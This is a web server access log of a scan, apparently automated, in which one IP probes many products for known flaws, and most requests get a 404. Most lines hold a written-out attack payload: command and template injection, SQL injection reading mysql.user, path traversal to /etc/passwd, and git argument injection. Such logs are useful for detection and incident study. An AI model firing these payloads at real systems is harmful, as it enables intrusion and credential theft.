205.185.122.202 - - [19/Oct/2025:20:56:21 +0530] "GET /source/pack/127.0.0.1/download.php?site=1%3Becho+%27%3C%3Fphp+echo+md5%2842437%29%3Bunlink%28__FILE__%29%3B%3F%3E%27+%3E+exkztz.php%3B HTTP/1.1" 404 1062
176.65.149.157 - - [19/Oct/2025:20:56:23 +0530] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:20:56:23 +0530] "GET /OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:20:56:24 +0530] "GET /wp-admin/admin-ajax.php?action=formcraft3_get&URL=http://127.0.0.1:0 HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:20:56:28 +0530] "GET /report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:20:56:29 +0530] "GET /portal/SptmForPortalThumbnail.jsp?preview=portal/SptmForPortalThumbnail.jsp HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:20:56:31 +0530] "GET /view/Behavior/toQuery.php?method=getList&objClass=%0aecho%20839133%20%3E/var/www/reporter/view/Behavior/802544.txt%0a HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:20:56:31 +0530] "GET /data/pbootcms.db HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:20:56:33 +0530] "GET /api/image/cover-upload?filename=../appsettings.json HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:20:56:34 +0530] "POST /swarm.cgi HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:56:36 +0530] "GET /assets/file:%2f%2f/etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:56:37 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:56:40 +0530] "POST /seeyon/thirdpartyController.do HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:20:56:40 +0530] "GET /ping HTTP/1.1" 404 1002
205.185.122.202 - - [19/Oct/2025:20:56:42 +0530] "GET /general/weibo/javascript/LazyUploadify/uploadify.php HTTP/1.1" 404 1098
205.185.122.202 - - [19/Oct/2025:20:56:43 +0530] "GET /logfile?d=crossdomain.xml HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:56:46 +0530] "GET /ui/vropspluginui/rest/services/uploadova HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:20:56:47 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:20:56:49 +0530] "GET /sysinit.shtml?r=52300 HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:56:51 +0530] "GET /ui/h5-vsan/rest/proxy/service/a/b HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:20:56:53 +0530] "GET /verify.php?id=1&confirm_hash= HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:56:53 +0530] "GET /mantis/verify.php?id=1&confirm_hash= HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:56:53 +0530] "GET /mantisBT/verify.php?id=1&confirm_hash= HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:20:56:54 +0530] "GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash= HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:20:56:54 +0530] "GET /bugs/verify.php?confirm_hash=&id=1 HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:56:54 +0530] "GET /web/php/sendLogToSupport.php?cmd=send_log&dev=a HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:20:56:57 +0530] "GET /cgi-bin-hax/ExportSettings.sh HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:20:56:58 +0530] "POST /user/zs.php?do=save HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:57:00 +0530] "POST /dologin.action HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:57:01 +0530] "POST /cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/xkjalqsdpz.jsp HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:20:57:03 +0530] "GET /%20../web-inf/ HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:57:04 +0530] "GET /glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(md5(18920))--%20&only_tasks=1 HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:20:57:04 +0530] "GET /scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(md5(18920))--%20&only_tasks=1 HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:20:57:08 +0530] "POST /module/retrieve_pwd/header.inc.php HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:20:57:10 +0530] "PUT /202623915.txt HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:20:57:14 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:57:16 +0530] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:20:57:19 +0530] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 404 1122
205.185.122.202 - - [19/Oct/2025:20:57:21 +0530] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:57:21 +0530] "POST /?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]=fsgx%25%25ewkc HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:57:22 +0530] "POST /?q=file%2Fajax%2Fname%2F%23value%2F HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:57:23 +0530] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1" 404 1186
205.185.122.202 - - [19/Oct/2025:20:57:24 +0530] "GET /OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:20:57:26 +0530] "POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:57:27 +0530] "POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:57:27 +0530] "POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:57:27 +0530] "POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:57:27 +0530] "GET /report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:20:57:27 +0530] "POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:57:28 +0530] "POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:57:28 +0530] "POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:57:28 +0530] "POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:57:29 +0530] "POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:57:29 +0530] "GET /ueditor/net/controller.ashx?action=catchimage&encode=utf-8 HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:20:57:29 +0530] "POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:57:29 +0530] "POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:57:30 +0530] "GET /view/Behavior/toQuery.php?method=getList&objClass=%0aecho%20853615%20%3E/var/www/reporter/view/Behavior/929412.txt%0a HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:20:57:30 +0530] "POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:57:30 +0530] "POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:57:32 +0530] "GET /authenticationserverservlet HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:20:57:33 +0530] "GET /api/image/cover-upload?filename=../appsettings.json HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:20:57:35 +0530] "POST /scgi-bin/platform.cgi HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:20:57:36 +0530] "GET /assets/file:%2f%2f/etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:57:39 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:57:40 +0530] "POST /seeyon/thirdpartyController.do HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:20:57:42 +0530] "POST /web/addons/ftp_download.php HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:20:57:43 +0530] "GET /general/weibo/javascript/LazyUploadify/uploadify.php HTTP/1.1" 404 1098
205.185.122.202 - - [19/Oct/2025:20:57:45 +0530] "GET /app/etc/local.xml HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:57:47 +0530] "GET /ui/vropspluginui/rest/services/uploadova HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:20:57:50 +0530] "POST /login.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:57:51 +0530] "GET /sysinit.shtml?r=52300 HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:57:54 +0530] "POST /WEB_VMS/LEVEL15/ HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:20:57:56 +0530] "GET /verify.php?id=1&confirm_hash= HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:57:56 +0530] "GET /mantis/verify.php?id=1&confirm_hash= HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:57:56 +0530] "GET /mantisBT/verify.php?id=1&confirm_hash= HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:20:57:57 +0530] "GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash= HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:20:57:57 +0530] "GET /bugs/verify.php?confirm_hash=&id=1 HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:57:59 +0530] "GET /yyoa/ext/https/getSessionList.jsp?cmd=getAll HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:20:58:00 +0530] "GET /cgi-bin-hax/ExportSettings.sh HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:20:58:02 +0530] "POST /php/rj_get_token.php HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:20:58:03 +0530] "POST /php/exportrecord.php?downname=../php/getjson.php HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:20:58:03 +0530] "POST /php/getjson.php HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:58:04 +0530] "POST /dologin.action HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:58:06 +0530] "GET /search/members.json?id%60%3D-1%29%2f%2a%2a%2funion%2f%2a1%2a%2fselect%2f%2a%2a%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cmd5(200890487)%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%231=1 HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:20:58:07 +0530] "GET /%20../web-inf/ HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:58:09 +0530] "GET /.//WEB-INF/weblogic.xml HTTP/1.1" 404 992
205.185.122.202 - - [19/Oct/2025:20:58:11 +0530] "POST /module/retrieve_pwd/header.inc.php HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:20:58:12 +0530] "GET /wp-json/mapsvg/v1/maps/2?id=1%27%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(0)))b)--+ HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:20:58:13 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:58:17 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:58:18 +0530] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 404 1122
205.185.122.202 - - [19/Oct/2025:20:58:20 +0530] "GET /api/filemanager?path=%2F..%2f..%2f HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:58:21 +0530] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1" 404 1186
205.185.122.202 - - [19/Oct/2025:20:58:25 +0530] "GET /index.php?s=member&c=api&m=checktitle&id=13&title=123&module=news,(select%20extractvalue(1,concat(0x7e,md5('xnfwc'),0x7e)))%20as%20aaa HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:58:26 +0530] "POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:58:26 +0530] "POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:58:27 +0530] "POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:58:27 +0530] "POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:58:27 +0530] "POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:58:27 +0530] "POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:58:28 +0530] "POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:58:28 +0530] "POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:58:28 +0530] "POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:58:29 +0530] "GET /ConsoleExternalUploadApi.XGI?key=FarmName&initParams=command_uploadAuthorizeKeyFile__user_admin%27-%27__pwd_password123__serverIdStr_1&sign=7627a11bf8f214451e7929f05299b9f6 HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:20:58:29 +0530] "POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:58:29 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:20:58:29 +0530] "POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:58:29 +0530] "POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:58:30 +0530] "GET /ueditor/net/controller.ashx?action=catchimage&encode=utf-8 HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:20:58:30 +0530] "POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:58:32 +0530] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:20:58:32 +0530] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:20:58:32 +0530] "GET /authenticationserverservlet HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:20:58:34 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:58:35 +0530] "POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce= HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:20:58:35 +0530] "POST /scgi-bin/platform.cgi HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:20:58:37 +0530] "POST /uapim/upload/grouptemplet?groupid=65&fileType=jsp HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:20:58:37 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:58:40 +0530] "GET /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aexpr%20897272469%20-%20877068621%0A%27 HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:20:58:41 +0530] "POST /web/addons/ftp_download.php HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:20:58:43 +0530] "POST /api/terminals HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:58:44 +0530] "GET /app/etc/local.xml HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:58:46 +0530] "GET /rpc/dir?path=/ HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:58:47 +0530] "POST /login.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:58:50 +0530] "GET /druid/index.html HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:20:58:52 +0530] "POST /WEB_VMS/LEVEL15/ HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:20:58:55 +0530] "POST /login.php?action=login&type=admin HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:58:56 +0530] "GET /yyoa/ext/https/getSessionList.jsp?cmd=getAll HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:20:58:58 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:20:58:59 +0530] "POST /php/rj_get_token.php HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:20:58:59 +0530] "POST /php/exportrecord.php?downname=../php/getjson.php HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:20:59:00 +0530] "POST /php/getjson.php HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:59:02 +0530] "GET /faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(24743456),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:59:02 +0530] "GET /search/members.json?id%60%3D-1%29%2f%2a%2a%2funion%2f%2a1%2a%2fselect%2f%2a%2a%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cmd5(207324871)%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%231=1 HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:20:59:04 +0530] "POST /graphql HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:59:06 +0530] "GET /.//WEB-INF/weblogic.xml HTTP/1.1" 404 992
205.185.122.202 - - [19/Oct/2025:20:59:10 +0530] "GET /device/usrcfg.conf HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:20:59:10 +0530] "GET /action/usrcfg.conf HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:20:59:11 +0530] "GET /wp-json/mapsvg/v1/maps/2?id=1%27%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(0)))b)--+ HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:20:59:14 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:59:16 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:59:21 +0530] "GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(209427794)%20as%20id%20from%20HrmResourceManager HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:20:59:21 +0530] "GET /api/filemanager?path=%2F..%2f..%2f HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:59:24 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:20:59:24 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:20:59:25 +0530] "GET /index.php?s=member&c=api&m=checktitle&id=13&title=123&module=news,(select%20extractvalue(1,concat(0x7e,md5('drepk'),0x7e)))%20as%20aaa HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:59:29 +0530] "GET /ConsoleExternalUploadApi.XGI?key=FarmName&initParams=command_uploadAuthorizeKeyFile__user_admin%27-%27__pwd_password123__serverIdStr_1&sign=7627a11bf8f214451e7929f05299b9f6 HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:20:59:29 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:20:59:29 +0530] "POST /login.cgi HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:59:32 +0530] "GET /deltaweb/hmi_useredit.asp?ObjRef=BAC.1000.ZSL3&formAction=Edit HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:20:59:33 +0530] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:20:59:33 +0530] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:20:59:34 +0530] "GET /20895688.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:59:35 +0530] "GET /index.html HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:59:35 +0530] "GET /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:59:36 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:59:36 +0530] "POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce= HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:20:59:37 +0530] "POST /getcfg.php HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:59:38 +0530] "POST /uapim/upload/grouptemplet?groupid=69&fileType=jsp HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:20:59:40 +0530] "GET /service/local/authentication/login HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:20:59:41 +0530] "GET /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aexpr%20888902257%20-%20834981598%0A%27 HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:20:59:42 +0530] "POST /rest/tinymce/1/macro/preview HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:20:59:43 +0530] "POST /api/terminals HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:59:45 +0530] "GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:20:59:45 +0530] "GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:20:59:45 +0530] "GET /rpc/dir?path=/ HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:59:47 +0530] "POST /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709×tamp=&nonce= HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:59:48 +0530] "GET /druid/index.html HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:20:59:51 +0530] "GET /rest/api/latest/projects/BIZEE/repos/bizee-communication-api/archive?filename=wN3Am&at=wN3Am&path=wN3Am&prefix=ax%00--exec=%60cat%20/etc/passwd%60%00--remote=origin HTTP/1.1" 404 1130
205.185.122.202 - - [19/Oct/2025:20:59:53 +0530] "POST /login.php?action=login&type=admin HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:59:56 +0530] "GET /resources//../WEB-INF/web.xml HTTP/1.1" 404 992
205.185.122.202 - - [19/Oct/2025:20:59:57 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:20:59:59 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:00:00 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:00:02 +0530] "GET /faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(38211244),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:21:00:04 +0530] "GET /appmonitor/protected/selector/server_file/files?folder=C://&suffix= HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:21:00:05 +0530] "GET /appmonitor/protected/selector/server_file/files?folder=/&suffix= HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:21:00:05 +0530] "POST /graphql HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:21:00:07 +0530] "GET /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+43588*43688,1--+&site=admin HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:21:00:08 +0530] "GET /device/usrcfg.conf HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:00:09 +0530] "GET /action/usrcfg.conf HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:00:10 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:00:11 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:00:12 +0530] "POST /content/auydhu HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:00:13 +0530] "POST /content/ifiunm HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:00:13 +0530] "GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(204499597)%20as%20id%20from%20HrmResourceManager HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:21:00:16 +0530] "GET /glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:21:00:17 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:00:17 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:00:20 +0530] "GET /app/kibana HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:00:22 +0530] "POST /login.cgi HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:00:24 +0530] "GET /api/get_device_details HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:00:25 +0530] "GET /deltaweb/hmi_useredit.asp?ObjRef=BAC.1000.ZSL3&formAction=Edit HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:00:27 +0530] "GET /73035462.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:00:28 +0530] "GET /index.html HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:00:28 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:00:28 +0530] "GET /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:00:30 +0530] "GET /info HTTP/1.1" 404 1002
205.185.122.202 - - [19/Oct/2025:21:00:31 +0530] "POST /getcfg.php HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:00:34 +0530] "GET /WiFi.shtml HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:00:34 +0530] "POST /cgi-bin/libagent.cgi?type=J HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:00:35 +0530] "GET /service/local/authentication/login HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:21:00:37 +0530] "POST /index.php?s=/home/page/uploadImg HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:00:38 +0530] "POST /rest/tinymce/1/macro/preview HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:21:00:41 +0530] "GET /plug/oem/AspCms_OEMFun.asp HTTP/1.1" 404 1046
